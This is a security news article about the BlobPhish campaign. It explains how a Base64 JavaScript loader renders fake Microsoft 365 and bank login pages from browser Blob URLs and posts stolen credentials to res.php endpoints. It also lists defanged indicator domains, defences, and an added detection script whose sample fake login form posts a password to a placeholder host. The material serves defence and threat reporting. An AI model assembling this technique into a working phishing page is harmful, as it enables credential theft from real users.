BlobPhish Attack Steals Login Credentials via Browser Blob Objects

Sarah Simpson
April 28, 2026

Key Takeaways

  • A sophisticated phishing campaign, dubbed BlobPhish, has been actively stealing login credentials since October 2024.
  • The attack leverages browser Blob URL APIs to generate phishing pages entirely within the victim’s browser, making them virtually invisible to traditional security tools.
  • Microsoft 365 users, major U.S. banks, and various financial platforms are primary targets, with victims spanning multiple sectors globally.
  • The campaign is ongoing and has shown a significant surge in activity in February 2026, indicating a well-maintained and mature threat operation.
  • Mitigation strategies include advanced sandbox analysis, proactive threat hunting, phishing-resistant MFA, and continuous employee training.

Since October 2024, a highly advanced, memory-resident phishing operation known as BlobPhish has been relentlessly compromising user credentials. This campaign specifically targets Microsoft 365 accounts, prominent U.S. banking institutions, and other financial services by exploiting browser Blob URL APIs. A critical aspect of BlobPhish’s success is its remarkable ability to evade detection by conventional security measures.

BlobPhish represents a significant evolution in credential-phishing tactics, fundamentally altering the method by which malicious login pages are delivered to unsuspecting victims.

Unlike traditional phishing attacks that host fake login pages on attacker-controlled web servers and serve them via standard HTTP, BlobPhish generates its phishing pages entirely within the victim’s browser using JavaScript Blob objects. This innovative approach results in a phishing payload that exists solely in memory, leaving no discernible forensic artifacts such as disk files, cache entries, or suspicious HTTP requests in proxy logs for security tools to flag.

BlobPhish attack detonated in the sandbox

The campaign, first identified in October 2024, has persisted without interruption for over 18 months. A notable increase in activity was observed in February 2026, underscoring its status as a mature and continuously developed threat rather than a fleeting opportunistic assault.

BlobPhish Kill Chain

The BlobPhish kill chain is ingeniously designed to circumvent both network-based and file-based security defenses:

  • Initial Access: Victims typically receive a phishing email, often disguised as a financial notification, invoice, or document-sharing alert. These emails contain links to seemingly trustworthy services like DocSend or shortened URLs from platforms such as t.co. Additionally, PDF attachments embedded with QR codes leading to malicious JavaScript pages have been observed, particularly targeting the energy sector.
  • Loader Execution: Clicking the malicious link redirects the victim to an attacker-controlled HTML page hosting a JavaScript loader. This loader, utilizing jQuery, covertly creates a hidden <a> anchor element. It then Base64-decodes a bundled phishing payload using atob(), constructs a Blob object of type text/html, generates a blob:https:// URL via window.URL.createObjectURL(), and finally forces the browser to navigate to this URL. All these actions occur without any visible user interaction.
Code responsible for blob object download
  • Evidence Destruction: Immediately after the browser navigates to the Blob URL, the loader executes window.URL.revokeObjectURL() and removes the anchor element from the Document Object Model (DOM). This action effectively eliminates any remaining in-memory traces of the loader’s operation.
  • Credential Harvest: The victim is then presented with a highly convincing replica of a login page for services such as Microsoft 365, Chase, Capital One, or other financial platforms. The browser’s address bar displays a blob:https:// URL, which can easily appear legitimate to an unsuspecting user. A built-in failed-login counter often prompts victims to re-enter their credentials multiple times, enhancing the accuracy of harvested data. Captured credentials are exfiltrated via HTTP POST requests to attacker-controlled endpoints, typically matching patterns like */res.php, */tele.php, or */panel.php. These endpoints are predominantly hosted on compromised legitimate WordPress sites.
Data exfiltration patterns
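The loader stage above leaves little on the wire, but the HTML page that carries it can still be inspected before a user ever opens it. The following is an added example, not code from the article or from the researchers who reported BlobPhish: a Node.js triage check that looks for the loader's API sequence (atob, a text/html Blob, createObjectURL, revokeObjectURL), decodes any embedded Base64 page, and reports whether it holds a password form posting to one of the exfiltration paths named in the kill chain. The sample page and the example.invalid host are constructed.

```javascript
// Added example (not from the article): static triage of an HTML page for the
// BlobPhish loader pattern. Runs under Node.js; the sample input is constructed.
const LOADER_MARKERS = [
  /\batob\s*\(/,
  /\bnew\s+Blob\s*\(/,
  /\btype\s*:\s*["']text\/html["']/,
  /\bcreateObjectURL\s*\(/,
  /\brevokeObjectURL\s*\(/,
];
// Exfiltration endpoint paths named in the article's kill chain.
const EXFIL_PATH = /\/(res|tele|panel)\.php\b/;

// Quoted Base64 literals long enough to hold a whole HTML page.
function extractBase64Literals(html) {
  const re = /["']([A-Za-z0-9+/]{64,}={0,2})["']/g;
  return Array.from(html.matchAll(re), (m) => m[1]);
}

function decodeBase64(s) {
  return Buffer.from(s, "base64").toString("utf8");
}

// Counts loader markers, inspects each embedded page, and gives a verdict:
// most markers present plus a decoded page that carries a password field.
function triagePage(html) {
  const markers = LOADER_MARKERS.filter((re) => re.test(html)).length;
  const findings = [];
  for (const b64 of extractBase64Literals(html)) {
    const page = decodeBase64(b64);
    if (!/<(html|form|input)\b/i.test(page)) continue; // not an embedded page
    const exfil = page.match(EXFIL_PATH);
    findings.push({
      hasPasswordField: /type\s*=\s*["']?password/i.test(page),
      exfilPath: exfil ? exfil[0] : null,
    });
  }
  const suspicious = markers >= 4 && findings.some((f) => f.hasPasswordField);
  return { markers, findings, suspicious };
}

// Constructed sample: a fake login form posting to a res.php path on a
// placeholder domain, embedded the way the loader stage embeds its payload.
const SAMPLE_PAYLOAD =
  '<html><form method="post" action="https://example.invalid/wp-includes/tmp/res.php">' +
  '<input name="u"><input type="password" name="p"></form></html>';
const SAMPLE_LOADER =
  '<script>var b=atob("' + Buffer.from(SAMPLE_PAYLOAD).toString("base64") + '");' +
  'var o=new Blob([b],{type:"text/html"});var u=URL.createObjectURL(o);' +
  '/* navigation step omitted */URL.revokeObjectURL(u);</script>';
```

A sandbox or mail-scanning pipeline can run triagePage over every HTML attachment or landing page it fetches; the marker threshold and the decoded-page check together avoid flagging ordinary pages that happen to call createObjectURL for downloads.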

BlobPhish Evades Conventional Defenses

BlobPhish targets an extensive range of high-value platforms, including Microsoft 365, OneDrive, SharePoint, Chase, Capital One, FDIC, E*TRADE, Charles Schwab, Morgan Stanley/Merrill Lynch, American Express, PayPal, and Intuit.

Phishing form imitating Chase Banking login page

While financial and cloud productivity lures are dominant, the victim organizations span diverse sectors, including Finance, Manufacturing, Education, Government, Transportation, and Telecommunications.

Geographically, approximately one-third of the observed victims are based in the United States, with additional activity noted across Germany, Poland, Spain, Switzerland, the UK, Australia, South Korea, Saudi Arabia, Qatar, Jordan, India, and Pakistan.

The campaign’s primary innovation for evasion lies in its use of the blob:https:// scheme. Since the phishing page is never transmitted over the network as a standalone HTTP response, it bypasses numerous security mechanisms:

  • URL reputation engines are ineffective because there is no external URL for them to scan.
  • Proxy logs show no suspicious requests related to the phishing page itself.
  • Secure Email Gateways (SEGs) miss the payload, as it materializes only after email delivery.
  • File-based endpoint solutions find nothing, as no file is ever written to disk.
  • Cache forensics yield no results, as the Blob URL is revoked before investigators can inspect it.

A single successful BlobPhish compromise can lead to severe consequences, including Business Email Compromise (BEC) fraud, complete Microsoft 365 tenant takeover, unauthorized wire transfers, manipulation of investment accounts, and even ransomware deployment following lateral movement within a network.

Beyond operational damage, organizations face significant legal exposure due to regulatory requirements such as GDPR’s 72-hour breach notification, SEC cybersecurity incident disclosure, and FFIEC authentication guidance.

Key Indicators of Compromise (IOCs)

IOC Type               | Example
Loader URL             | hxxps[://]mtl-logistics[.]com/blb/blob[.]html
Exfiltration endpoint  | hxxps[://]mtl-logistics[.]com/css/sharethepoint/point/res[.]php
Capital One exfil      | hxxps[://]wajah4dslot[.]com/wp-includes/certificates/tmp//res[.]php
Chase Banking exfil    | hxxps[://]hnint[.]net/cgi-bin/peacemind//res[.]php
E*TRADE exfil          | hxxps[://]ftpbd[.]net/wp-content/plugins/cgi-/trade/trade//res[.]php
tele.php variant       | hxxps[://]_wildcard_[.]gonzalezlawnandlandscaping[.]com/…/tele[.]php

Additional compromised domains identified include larva888[.]com, riobeautybrazil[.]com, i-seotools[.]com, and mts-egy[.]net.

What You Should Do

To defend against sophisticated attacks like BlobPhish, security teams must implement a multi-layered defense strategy focused on dynamic analysis and user education:

  • Deploy Advanced Sandbox Analysis: Utilize sandbox environments capable of executing JavaScript within real browsers to safely detonate blob-based payloads before they reach end-users.
  • Proactive Threat Hunting: Actively hunt for BlobPhish activity using the BlobPhishLoaderHTML YARA rule and pivot queries (e.g., url:"/res.php$", url:"*/blob.html$") within threat intelligence platforms.
  • Enforce Phishing-Resistant MFA: Implement and enforce phishing-resistant Multi-Factor Authentication (MFA), such as FIDO2/hardware keys, on all critical platforms like Microsoft 365 and banking portals to significantly reduce the impact of successful credential compromise.
  • Integrate Live Threat Intelligence: Automate the integration of real-time threat intelligence feeds that push BlobPhish Indicators of Compromise (IOCs) directly into firewalls, proxies, and SIEM rules to rapidly adapt defenses as attacker infrastructure evolves.
  • Conduct Regular Employee Training: Educate employees to recognize the unique red flag of unexpected blob:https:// URLs in their browser address bars, fostering a culture of vigilance against novel phishing techniques.
